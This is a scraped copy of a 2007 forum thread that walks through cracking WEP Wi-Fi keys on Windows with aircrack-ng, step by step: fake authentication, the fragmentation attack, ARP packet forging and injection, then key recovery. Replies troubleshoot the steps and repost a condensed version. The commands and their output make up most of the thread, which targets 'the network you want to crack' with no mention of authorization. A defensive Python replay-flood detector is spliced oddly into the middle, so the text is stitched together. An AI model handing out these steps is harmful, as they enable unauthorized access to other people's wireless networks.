
Page 1: The Cracking Wifi

8/13/2019 The Cracking Wifi

http://slidepdf.com/reader/full/the-cracking-wifi 1/16

THE CRACKING:

Step 1:

- Open a command prompt (start > run > cmd.exe)

Step 2:

- Type the following in the command prompt:

Quote: cd c:\aircrack\

- HIT ENTER

Step 3:

- Type the following in the same command prompt:

Quote: airserv-ng -d commview.dll

- HIT ENTER
- You should see something like this coming up in the command prompt:

Quote:
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

Step 4:

- Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)
- Type the following in the new command prompt:

Quote: cd c:\aircrack\

- HIT ENTER

Step 5:

- Now type this in the same command prompt:

Quote: airodump-ng 127.0.0.1:666

- HIT ENTER

Note: if you know which channel the network you want to monitor is on, you can specify it. I recommend this!:


Quote: airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666

Airodump-ng should start capturing data from the networks on the given channel now; you'll notice it isn't going fast (except if it's a big company's network or something). We are going to speed this process up!

Take a note of the following:

1: BSSID of the network you want to crack = MAC address.
2: ESSID of the network you want to crack = name of the network (example: wifi16, mynetwork, ...)
3: The MAC of the card you are using to monitor the packets

LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!

Step 6:

- Open a new command prompt
- Type in the following:

Quote: cd c:\aircrack\

- HIT ENTER

Step 7: - Type in the following in command prompt:

Quote: 

aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

es quite confusing so a quick example:

ESSID = wifi16
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:

aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this as the outcome:

Quote:
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful


if you get:

Quote: AP rejects the source MAC address

It means MAC filtering is enabled on the network you want to crack and you'll need to get hold of a MAC address that's allowed access.

if you keep getting:

Quote: sending authentication request

Try moving closer to the AP!

Step 8: in the same command prompt as the one in step 7 type:

Quote: aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666

es quite confusing once again so a quick example:

BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01

so that will get me:

aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666

if all goes well you'll get this:

Quote:
Waiting for a data packet...
Read #number packets...

Step 9: if you wait a little bit you'll soon be prompted with a packet like this:

Quote:

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = the bssid
Dest. MAC = the dest mac
Source MAC = the source mac


0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q..D...w.....<R.
0x0070: 0505 933f af2f 740e                      ...?./t.

Use this packet ?

note: size can vary, I always pressed in y and it worked
- press in Y
- HIT ENTER

You should see something like this coming up (or similar):

Quote:
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Note 1: It doesn't need to be 1500 bytes!!

Note 2: Check the bold part (the fragment-0124-161129.xor filename), you're going to need this file!

AGAIN DON'T CLOSE THIS COMMAND PROMPT!!

if you keep getting:

Quote:
Data packet found!
Sending fragmented packet
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating...


Sending fragmented packet...

Just keep trying! It automatically starts over again (moving closer to the AP has been reported to help.)

anyways, if you got the bytes of keystream (everything worked) it's time for the next step!

Step 10: 

- Press CTRL + C in the command prompt used in step 8
- Now type in the following:

Quote: packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -h MAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l 192.168.1.1 -y fragment-0124-161129.xor -w arp-request

(the -l is an ELL, not a 1)

Remember the file I made bold in part 8? Well it's obviously the same as in 9, meaning you need to put the same filename here. The part I made green here (arp-request) is the filename you use to save the packet; you can choose whatever you want but you must use this filename in the upcoming steps!

Step 11: 

Now that we've got our ARP REQ packet we can start injecting!

Here's how to do this.
- Go to the command prompt used in step 9
- Type in the following:

Quote: aireplay-ng -2 -r arp-request 127.0.0.1:666

The green part (arp-request) once again indicates the filename!

You should now see something like this coming up:

Quote: Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:AB:CB:9D

0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d  I.!.x..B/....0.M
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1  :.....gC.V$.....
0x0040: d64f b709                                .O..

Use this packet ?

- Type in Y
- HIT ENTER

This should come up now:

Quote:
Saving chosen packet in replay_src-0124-163529.cap
You should also start airodump-ng to capture replies.
End of file.

sent #numberOfPackets ... (#number pps)

You'll see the numberOfPackets rising really fast, you are injecting these packets now.

Step 12:

Now go back to the command prompt where you had airodump-ng open and press CTRL + C. Now type in the following:

Quote: airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666

Note: Filename = The name of the file where the data packets are saved, this will be used in the next step

If all goes correct you should be capturing as many packets per second as you are injecting (maybe even more).

Step 13:

When you think you have enough... note: 200000 min for 64bit (just capture 1 Million to be sure) ...press CTRL + C in the command prompt that has airodump-ng running and enter the following:

Quote: aircrack-ng -n 64 Filename.cap

note:

 Filename = see previous step

64 = the bit depth of the key (128 for 128bit etc...)


 and if it goes like planned a message will pop-up saying:

Quote: KEY FOUND: YourKey

That's it! I hope this was helpful, any questions/remarks/complaints please ask/tell and I'll try to help/respond as soon as possible!!

Extra useful links:

WEP CRACK tutorial from nokia: viewtopic.php?t=2069&highlight=wep

Info about the attack used (fragmentation): http://www.aircrack-ng.org/doku.php?id=fragmentation

Zermelo's thread about this subject: viewtopic.php?t=6781&postdays=0&postorder=asc&start=0

Topic on another forum about this: http://tinyshell.be/aircrackng/forum/in ... pic=1626.0

-------------------------------------------------------------------------------------------

Greetz .Transmit (If you all like this tut I'll make one on cracking WEP with commview too)

Last edited by .Transmit on Tue May 11, 2010 7:45 pm, edited 2 times in total.
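What steps 7 to 12 of the tutorial put on the air is easy to recognise from the defender's side, which is the point of this added example (it is not code from the thread or from the aircrack-ng project). It decodes the header fields aireplay-ng prints for a frame (the FromDS/ToDS/WEP flags, BSSID, source and destination) from a hex dump laid out like the dumps above, and then runs a simple wireless-IDS heuristic over a constructed frame log: the replay in step 11 resends one captured frame byte for byte, so a burst of protected data frames with identical length, identical IV and a broadcast destination from a single source is flagged. The sample dump reuses the addresses shown in step 11; the frame log, the client MACs in it and the thresholds are constructed for the example.

```python
"""Added example (not from the forum thread or the aircrack-ng project):
decode the 802.11 header fields aireplay-ng prints and flag a WEP replay
flood from a log of frame summaries. All sample data is constructed."""
from collections import defaultdict
import random

HEX_DIGITS = set("0123456789abcdefABCDEF")

# Constructed dump: a clean copy of the first 32 bytes of the 68-byte ARP
# request shown in step 11 (same addresses and IV), in aireplay-ng's layout.
SAMPLE_DUMP = """\
0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
0x0010: ffff ffff ffff 8001 6c48 0000 0999 881a  ........lH......
"""


def parse_hex_dump(dump):
    """Collect the 16-bit hex words of each 'offset: words  ascii' line.
    Reading stops at the first token that is not four hex digits, which
    skips the trailing ASCII column."""
    out = bytearray()
    for line in dump.strip().splitlines():
        words = []
        for tok in line.partition(":")[2].split():
            if len(words) == 8 or len(tok) != 4 or not set(tok) <= HEX_DIGITS:
                break
            words.append(tok)
        out += bytes.fromhex("".join(words))
    return bytes(out)


def mac(raw):
    return ":".join(f"{b:02X}" for b in raw)


def parse_80211_header(frame):
    """Decode frame control, the DS bits, the addresses and, for a protected
    (WEP) frame, the 3-byte IV that directly follows the MAC header."""
    fc0, fc1 = frame[0], frame[1]
    to_ds, from_ds = bool(fc1 & 0x01), bool(fc1 & 0x02)
    protected = bool(fc1 & 0x40)
    a1, a2, a3 = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    # Address roles depend on the ToDS/FromDS pair (IEEE 802.11 address table).
    if to_ds and not from_ds:        # station -> AP: RA=BSSID, TA=SA, DA
        bssid, src, dst = a1, a2, a3
    elif from_ds and not to_ds:      # AP -> station: DA, TA=BSSID, SA
        bssid, src, dst = a2, a3, a1
    elif not to_ds and not from_ds:  # IBSS / management: DA, SA, BSSID
        bssid, src, dst = a3, a2, a1
    else:                            # WDS: a fourth address carries the SA
        bssid, src, dst = None, mac(frame[24:30]), a3
    hdr_len = 30 if (to_ds and from_ds) else 24
    iv = mac(frame[hdr_len:hdr_len + 3]) if protected else None
    return {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4, "to_ds": to_ds,
            "from_ds": from_ds, "protected": protected,
            "bssid": bssid, "src": src, "dst": dst, "iv": iv}


def detect_replay_flood(records, window_s=1.0, min_frames=100):
    """records: dicts with t (seconds), src, dst, length, protected, iv.
    Frames are bucketed into fixed windows; any (src, dst, length) seen
    min_frames times or more in one window is reported. A replayed WEP frame
    is resent byte for byte, so its IV never changes, whereas a genuine
    sender changes the IV every frame: iv_reuse is the corroborating signal."""
    buckets = defaultdict(list)
    for r in records:
        if r["protected"]:
            key = (int(r["t"] // window_s), r["src"], r["dst"], r["length"])
            buckets[key].append(r["iv"])
    alerts = []
    for (win, src, dst, length), ivs in sorted(buckets.items()):
        if len(ivs) >= min_frames:
            alerts.append({"window": win, "src": src, "dst": dst,
                           "length": length, "count": len(ivs),
                           "iv_reuse": len(set(ivs)) == 1,
                           "broadcast": dst == "FF:FF:FF:FF:FF:FF"})
    return alerts


def build_sample_records(seed=1):
    """Constructed frame log: 5 s of ordinary WEP data from three clients
    (about 10 frames/s, fresh IV each time) plus one second holding 300
    copies of the step 11 broadcast ARP request, all with the same IV."""
    rng = random.Random(seed)
    clients = ["00:0E:9B:45:40:ED", "00:D0:CF:03:34:8C", "00:1B:77:AA:BB:CC"]
    recs, iv_counter = [], 0x100000
    for i in range(50):
        iv_counter += 1
        recs.append({"t": i * 0.1, "src": rng.choice(clients),
                     "dst": "00:14:6C:7E:40:80",
                     "length": rng.choice([98, 146, 590, 1500]),
                     "protected": True, "iv": mac(iv_counter.to_bytes(3, "big"))})
    for i in range(300):
        recs.append({"t": 3.0 + i / 300, "src": "00:0F:B5:AB:CB:9D",
                     "dst": "FF:FF:FF:FF:FF:FF", "length": 68,
                     "protected": True, "iv": "6C:48:00"})
    return recs


if __name__ == "__main__":
    h = parse_80211_header(parse_hex_dump(SAMPLE_DUMP))
    print(f"FromDS: {int(h['from_ds'])}, ToDS: {int(h['to_ds'])} "
          f"({'WEP' if h['protected'] else 'open'})  BSSID={h['bssid']} "
          f"SRC={h['src']} DST={h['dst']} IV={h['iv']}")
    for alert in detect_replay_flood(build_sample_records()):
        print("ALERT replay flood:", alert)
```

Running the block prints the decoded header of the sample frame (ToDS set, WEP flag set, BSSID 00:14:6C:7E:40:80, destination broadcast, IV 6C:48:00, exactly what aireplay-ng shows in step 11) and one alert for the constructed burst; the same record shape can be filled from any monitor-mode capture tool. The IV-reuse check is the WEP-specific part: WEP gives the receiver no replay counter, which is why the frames in step 11 are accepted at all, and why the durable mitigation is to retire WEP in favour of WPA2/WPA3 (whose per-frame replay counters reject a resent frame) rather than to tune the detector.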

dgpilot  Post subject: Posted: Fri May 18, 2007 6:02 pm

Probie

Joined: Fri May 18, 2007 1:13 am
Posts: 8

This tut is AWESOME!!! And so far it works like a charm, thanks very much.

The only thing I had trouble with is step 3. It didn't work for me unless I entered the device id

dinowuff   Post subject: Posted: Fri May 18, 2007 6:26 pm

I've posted HOW many

Joined: Sun Dec 25, 2005 11:26 pm
Posts: 4933
Location: Michigan

WRONG WRONG WRONG

Step one is Turn ON Laptop...

Just Kidding. Nice example with good detail. Way to pull all that info into one place.

_________________

No lusers were harmed in the creation of this Taz Zone Post. AND I WANT TO KNOW WHY NOT!
09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

dinowuff   Post subject: Posted: Fri May 18, 2007 6:35 pm

I've posted HOW many

Joined: Sun Dec 25, 2005 11:26 pm
Posts: 4933
Location: Michigan

Now go dig it!

I just submitted the thing

_________________

No lusers were harmed in the creation of this Taz Zone Post. AND I WANT TO KNOW WHY NOT!
09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0

brandnew2this  Post subject: Posted: Fri May 18, 2007 7:46 pm

I COULD be outshopping

Joined: Wed Mar 14, 2007 2:15 am
Posts: 65
Location: Kentucky

I had trouble with step 3 as well, what did you all do exactly? Mine said something about adapter not found. It's a Netgear and I know it works with CommView, WildPackets, aircrack and BackTrack, so I was just trying to do it this way in order to make a video tutorial or something

jaymill230  Post subject: Posted: Fri May 18, 2007 7:52 pm

UtterTazNutter

Joined: Thu Jan 04, 2007 9:59 pm
Posts: 2227
Location: Camp Lejeune, NC

I'm doing video tutorials for backtrack, but I've been a bit lazy lately

_________________
oo-rah
www.jaymill.net

.Transmit  Post subject: Posted: Fri May 18, 2007 9:51 pm

1st Century Addict

Joined: Sat Nov 04, 2006 12:47 pm
Posts: 109

Strange, I'll try and see if I can get a solution for that problem with step 3, what error were you getting exactly?

EDIT: K maybe found a solution for the ones in trouble with step 3!

Try this (let me know if it works): type this in the command window where the airserv command failed:

Quote: airserv-ng -d "commview.dll|debug"

Quotes are important!

You probably get something like this:

Quote:
Opening card commview.dll|debug
Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg ComboCard Gold - Paketplaner-Miniport
Adapter not found
get_guid()
airserv-ng: wi_open(): No error

now type this:

Quote: airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"

Quotes are important!

The red parts (the GUID in braces) need to be the same! (they probably differ for everyone)

Let me know if it works! and still try to give me the full error.

dgpilot  Post subject: Posted: Fri May 18, 2007 10:48 pm

Probie

Joined: Fri May 18, 2007 1:13 am
Posts: 8

Yep that's what I had used earlier and it worked. I guess it depends on your config and cards.

brandnew2this  Post subject: Posted: Sat May 19, 2007 7:22 am

I COULD be outshopping

Joined: Wed Mar 14, 2007 2:15 am
Posts: 65
Location: Kentucky

will try in the a.m. I just got back from my bachelor party so I'm not really feeling like............ well you know

gismo  Post subject: Re: Tutorial: Crack WEP with aircrack + inject packets (WIND

Posted: Sun May 20, 2007 6:54 pm

Wannabee

Joined: Sun May 20, 2007 6:33 pm
Posts: 1

Hello there! This tutorial looks really amazing, however I'm having trouble with step number 3 - after typing airserv-ng -d commview.dll instead of

Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666

I see

Opening card commview.dll
F1
init_lib<>airserv-ng: wi_open<>: No error

After I try to type in step 5

airodump-ng 127.0.0.1:666 or
airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666 (In my case channel 7 is the best one)

I just get a message "Failed to connect". In other words connecting to 127.0.0.1:666 is not possible in my case.

I ask you for apologies, I am a newbie, just let me know if you have any idea how to work this out. I am using Windows Vista on an Acer laptop with Atheros AR5005G network adapter, I installed everything according to the advices (drivers, dll files etc., commview is working normally as well).

Every little helps.

Thanks.

Xplode  Post subject: Posted: Thu May 24, 2007 8:34 pm

Probie

Joined: Thu May 24, 2007 8:18 pm
Posts: 7

gismo are you sure you got the right drivers?? I solved the problem installing Commview drivers, I had Wildpackets first.

I wanted to ask if the debug function would work like this in case I am using wildpackets: airserv-ng -d "peek.dll|debug" Or what else??

The AP I am connecting to seems to have very low traffic so I keep having (at step 9):

Data packet found!
Sending fragmented packet
No answer, repeating...
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating...
Sending fragmented packet...

even after trying for 2 hours... is the low traffic the problem?? I'm saying it because in airodump I got around 10 beacons per second but NO DATA (data=0) for my AP. How could I increase that?? I tried by connecting (without a valid WEP Key) using my integrated wireless card, and I had some data, but not sufficient or useful.

Can someone give me some hints please?

jaymill230  Post subject: Posted: Thu May 24, 2007 8:43 pm

UtterTazNutter

Joined: Thu Jan 04, 2007 9:59 pm
Posts: 2227
Location: Camp Lejeune, NC

check my tutorial for clientless WEP cracking with fake auth, it's written for backtrack, but does the exact same thing, range is often a problem.

_________________
oo-rah
www.jaymill.net

Xplode  Post subject: Posted: Thu May 24, 2007 8:57 pm

Probie

Joined: Thu May 24, 2007 8:18 pm
Posts: 7

I don't think range is my problem, signal is very strong, could it be that anyway? I'll read your tut carefully, thanx

Mufftool  Post subject: Posted: Thu May 24, 2007 9:42 pm

Probie

Joined: Thu May 24, 2007 9:16 pm
Posts: 5

Hi, I can get to step 9, but when I enter Y after 'Use this packet?', I get a blue screen, flashed error message and my computer dies.

jaymill230  Post subject: Posted: Fri May 25, 2007 12:24 am

UtterTazNutter

Joined: Thu Jan 04, 2007 9:59 pm
Posts: 2227
Location: Camp Lejeune, NC

the program was just recently patched to windows, so it's a bit buggy. It may be a driver problem, try reinstalling your wildpackets driver.

In this example:

the id# of my adapter is {177946D-6D58-4272-AACE-D11DFAE55B8D}
the essid of the AP is VQD21
the bssid of the AP is 00:18:01:E6:B4:3F
the mac address of MY adapter is: 00:0E:9B:45:40:ED
the AP is on channel 9
the driver is the commview atheros driver

Fragmentation Attack

Step 1: Start the wireless interface in monitor mode on the AP channel

airserv-ng -d "commview.dll|{177946D-6D58-4272-AACE-D11DFAE55B8D}" -c 9

Step 2: Use aireplay-ng to do a fake authentication with the access point

aireplay-ng -1 0 -e VQD21 -a 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED 127.0.0.1:666

Step 3: Use aireplay-ng to run the fragmentation attack and obtain PRGA data

aireplay-ng -5 -b 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED 127.0.0.1:666

Step 4: Use packetforge-ng to generate an ARP packet

packetforge-ng -0 -a 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED -k 255.255.255.255 -l 255.255.255.255 -y fragment-0124-161129.xor -w arp-request.cap

Step 5: Use aireplay-ng to replay our forged ARP request

aireplay-ng -2 -r arp-request.cap 127.0.0.1:666

Step 6: Start airodump-ng to capture the IVs

airodump-ng -c 9 --bssid 00:18:01:E6:B4:3F --ivs -w VQD21 127.0.0.1:666

Step 7: Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:18:01:E6:B4:3F VQD21.ivs

As a heuristic consideration, for a 64 bit key you should capture 250,000 IVs, 2,000,000 for a 104 bit key.